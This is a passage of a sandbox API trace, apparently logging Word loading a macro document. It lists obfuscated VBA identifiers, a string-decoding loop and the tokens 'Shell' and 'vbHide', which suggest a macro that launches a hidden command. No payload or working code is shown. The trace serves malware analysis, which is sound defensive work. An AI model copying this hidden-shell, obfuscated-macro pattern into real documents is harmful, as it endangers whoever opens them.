0x100fdd [0017.008] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5070000 [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.008] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.009] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="OGADJTPBNNVIKR" | out: _Dst="OGADJTPBNNVIKR") returned 0x0 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.009] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="FMBVJVBB" | out: _Dst="FMBVJVBB") returned 0x0 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.009] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="FMBVJVBB" | out: _Dst="FMBVJVBB") returned 0x0 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shell") returned 0x10d756 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OGADJTPBNNVIKR") returned 0x10deec [0017.009] strcpy_s (in: _Dst=0x7fef106d2b0, _DstSize=0x100, _Src="OGADJTPBNNVIKR" | out: _Dst="OGADJTPBNNVIKR") returned 0x0 [0017.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbHide") returned 0x1057ba [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MsgBox") returned 0x105297 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FMBVJVBB") returned 0x10d872 [0017.010] strcpy_s (in: _Dst=0x7fef106d2b0, _DstSize=0x100, _Src="FMBVJVBB" | out: _Dst="FMBVJVBB") returned 0x0 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDFNHXYJY") returned 0x10490a [0017.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032c96, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0017.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032c96, cbMultiByte=9, lpWideCharStr=0x7831cb8, cchWideChar=9 | out: lpWideCharStr="KDFNHXYJY") returned 9 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZXUXMWSDNWUXFKZROLAKXAXFS") returned 0x102ed8 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UIZLJHCZYXCKDO") returned 0x106452 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NIFULPKBRS") returned 0x10f68b [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NIFULPKBRS") returned 0x10f68b [0017.011] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="NIFULPKBRS" | out: _Dst="NIFULPKBRS") returned 0x0 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZXUXMWSDNWUXFKZROLAKXAXFS") returned 0x102ed8 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KSTUELH") returned 0x10e71c [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x10b5ba [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0017.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x10b5ba [0017.011] strcpy_s (in: _Dst=0x7fef106d2b0, _DstSize=0x100, _Src="WTBWUKRWBTLKFVPIDGVYKDKCX" | out: _Dst="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x0 [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NIFULPKBRS") returned 0x10f68b [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.012] strcpy_s (in: _Dst=0x7fef106d2b0, _DstSize=0x100, _Src="RZTNAMICZ" | out: _Dst="RZTNAMICZ") returned 0x0 [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0017.012] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NIFULPKBRS") returned 0x10f68b [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.013] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="ELNWJPYGEKSJKWJXKKAAHOPC" | out: _Dst="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x0 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Asc") returned 0x107521 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZXUXMWSDNWUXFKZROLAKXAXFS") returned 0x102ed8 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.013] strcpy_s (in: _Dst=0x7fef106d2b0, _DstSize=0x100, _Src="ELNWJPYGEKSJKWJXKKAAHOPC" | out: _Dst="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x0 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x10b5ba [0017.013] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="WTBWUKRWBTLKFVPIDGVYKDKCX" | out: _Dst="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x0 [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.013] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.014] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="ELNWJPYGEKSJKWJXKKAAHOPC" | out: _Dst="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x0 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UIZLJHCZYXCKDO") returned 0x106452 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x10b5ba [0017.014] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="WTBWUKRWBTLKFVPIDGVYKDKCX" | out: _Dst="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x0 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ELNWJPYGEKSJKWJXKKAAHOPC") returned 0x10e40a [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KSTUELH") returned 0x10e71c [0017.014] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="KSTUELH" | out: _Dst="KSTUELH") returned 0x0 [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KSTUELH") returned 0x10e71c [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WTBWUKRWBTLKFVPIDGVYKDKCX") returned 0x10b5ba [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZTNAMICZ") returned 0x10f06c [0017.014] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDFNHXYJY") returned 0x10490a [0017.015] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="KDFNHXYJY" | out: _Dst="KDFNHXYJY") returned 0x0 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KSTUELH") returned 0x10e71c [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032bee, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0017.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5032bee, cbMultiByte=14, lpWideCharStr=0x781af28, cchWideChar=14 | out: lpWideCharStr="VRUOAIRHKHHTMF") returned 14 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IKJKBSKNJNPOGLRADOUVBMSFL") returned 0x100c3e [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.015] strcpy_s (in: _Dst=0x7fef106d150, _DstSize=0x100, _Src="VRUOAIRHKHHTMF" | out: _Dst="VRUOAIRHKHHTMF") returned 0x0 [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDFNHXYJY") returned 0x10490a [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IKJKBSKNJNPOGLRADOUVBMSFL") returned 0x100c3e [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0017.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0017.015] CExposedStream::Read () returned 0x0 [0017.015] CExposedStream::Release () returned 0x1 [0017.015] CExposedStream::Release () returned 0x0 [0017.016] CExposedStream::Release () returned 0x0 [0017.016] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0080) [0017.016] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a76690) [0017.016] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd3a4b0) [0017.016] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd38480) [0017.016] CExposedStream::Seek () returned 0x80030102 [0017.016] CExposedStream::Release () returned 0x0 [0017.016] IMalloc:Free (This=0x7fefe9e5380, pv=0x7957ef0) [0017.016] lstrcpyA (in: lpString1=0xa397a7c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0017.016] CExposedDocFile::Stat () returned 0x0 [0017.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa397a7c, cbMultiByte=-1, lpWideCharStr=0x287bd0, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0017.016] CExposedDocFile::OpenStream () returned 0x0 [0017.016] CExposedDocFile::AddRef () returned 0x3 [0017.016] CExposedStream::Stat () returned 0x0 [0017.016] CExposedStream::Read () returned 0x0 [0017.016] lstrlenA (lpString="") returned 0 [0017.016] lstrcpyA (in: lpString1=0xa3adf50, lpString2="" | out: lpString1="") returned="" [0017.016] lstrlenA (lpString="") returned 0 [0017.016] lstrcpyA (in: lpString1=0xa3adf90, lpString2="" | out: lpString1="") returned="" [0017.017] lstrcpynA (in: lpString1=0xa398ab0, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0017.017] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0017.017] lstrcpyA (in: lpString1=0xa398cf0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0017.017] lstrcpynA (in: lpString1=0xa398d50, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0017.017] lstrlenA (lpString="0, 0, 0, 0, C") returned 13 [0017.017] lstrcpyA (in: lpString1=0xa398f90, lpString2="0, 0, 0, 0, C" | out: lpString1="0, 0, 0, 0, C") returned="0, 0, 0, 0, C" [0017.017] lstrlenA (lpString="52, 52, 1640, 737, Z") returned 20 [0017.017] lstrcpyA (in: lpString1=0xa399110, lpString2="52, 52, 1640, 737, Z" | out: lpString1="52, 52, 1640, 737, Z") returned="52, 52, 1640, 737, Z" [0017.017] CExposedDocFile::OpenStream () returned 0x0 [0017.017] CExposedStream::Stat () returned 0x0 [0017.017] CExposedStream::Read () returned 0x0 [0017.017] CExposedStream::Release () returned 0x0 [0017.017] lstrcpyA (in: lpString1=0xa3adf70, lpString2="" | out: lpString1="") returned="" [0017.018] lstrcmpiA (lpString1="ThisDocument", lpString2="ThisDocument") returned 0 [0017.018] lstrlenA (lpString="ThisDocument") returned 12 [0017.018] lstrcpyA (in: lpString1=0xa3adfb0, lpString2="" | out: lpString1="") returned="" [0017.018] lstrcmpiA (lpString1="NewMacros", lpString2="NewMacros") returned 0 [0017.018] lstrlenA (lpString="NewMacros") returned 9 [0017.018] atoi (_Str="393222000") returned 393222000 [0017.018] lstrcpynA (in: lpString1=0xa3acb2c, lpString2="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}", iMaxLength=39 | out: lpString1="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}" [0017.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{00000000-0000-0000-0000-000000000000}", cchWideChar=-1, lpMultiByteStr=0x287bc0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{00000000-0000-0000-0000-000000000000}", lpUsedDefaultChar=0x0) returned 0 [0017.018] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned -1 [0017.018] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0017.018] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0017.018] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0017.018] CExposedStream::Commit () returned 0x0 [0017.018] CExposedStream::Release () returned 0x0 [0017.018] CExposedDocFile::OpenStream () returned 0x80030002 [0017.018] lstrlenA (lpString="&H00000001") returned 10 [0017.018] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0017.018] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0017.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa3998e0, cbMultiByte=-1, lpWideCharStr=0x287c00, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 39 [0017.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa399907, cbMultiByte=-1, lpWideCharStr=0x287bf0, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0017.019] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0017.019] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=8, lpWideCharStr=0x7831c88, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0017.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x287b00, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0017.019] lstrlenA (lpString="Project") returned 7 [0017.019] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778bfc0 [0017.019] GetCursorPos (in: lpPoint=0x287dd0 | out: lpPoint=0x287dd0*(x=777, y=852)) returned 1 [0017.019] GetCapture () returned 0x0 [0017.019] WindowFromPoint (Point=0x35400000309) returned 0x101e4 [0017.019] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x958 [0017.019] SendMessageA (hWnd=0x101e4, Msg=0x84, wParam=0x0, lParam=0x3540309) returned 0x1 [0017.019] SendMessageA (hWnd=0x101e4, Msg=0x20, wParam=0x101e4, lParam=0x2000001) returned 0x1 [0017.021] SetCursor (hCursor=0x10007) returned 0x10007 [0017.022] GetCurrentThreadId () returned 0x958 [0017.022] GetCurrentThreadId () returned 0x958 [0017.023] CExposedDocFile::CreateStorage () returned 0x0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x280) returned 0x77eabc0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x1738) returned 0x7a76690 [0017.023] GetLocalTime (in: lpSystemTime=0x287608 | out: lpSystemTime=0x287608*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1d2)) [0017.023] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0x77eabea, _BufferCount=0x103, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0017.023] wcsncpy_s (in: _Destination=0x2872d0, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.023] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287200, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.023] wcscpy_s (in: _Destination=0x551e870, _SizeInWords=0xe, _Source="*\\Z035c2b45a3" | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.023] wcsncpy_s (in: _Destination=0x287310, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.023] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287240, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.023] CExposedDocFile::AddRef () returned 0x2 [0017.023] CExposedDocFile::AddRef () returned 0x2 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x84) returned 0x7934f50 [0017.023] wcscpy_s (in: _Destination=0x7934fc0, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5310 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f53d0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e1980 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e1bd0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e1e20 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778bea0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x7507f70 [0017.023] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x286f7c, cchData=6 | out: lpLCData="1252") returned 5 [0017.023] atoi (_Str="1252") returned 1252 [0017.023] GetLocalTime (in: lpSystemTime=0x286f70 | out: lpSystemTime=0x286f70*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1d2)) [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935100 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0a0 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935190 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be70 [0017.023] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935220 [0017.024] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0b0 [0017.024] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0c0 [0017.024] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x52c0000 [0017.024] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x9170000 [0017.025] CExposedDocFile::CreateStream () returned 0x0 [0017.025] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0x7957ef0 [0017.025] CExposedStream::AddRef () returned 0x2 [0017.025] CExposedStream::Release () returned 0x1 [0017.025] CExposedStream::Release () returned 0x0 [0017.025] IMalloc:Free (This=0x7fefe9e5380, pv=0x7957ef0) [0017.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0017.025] VirtualAlloc 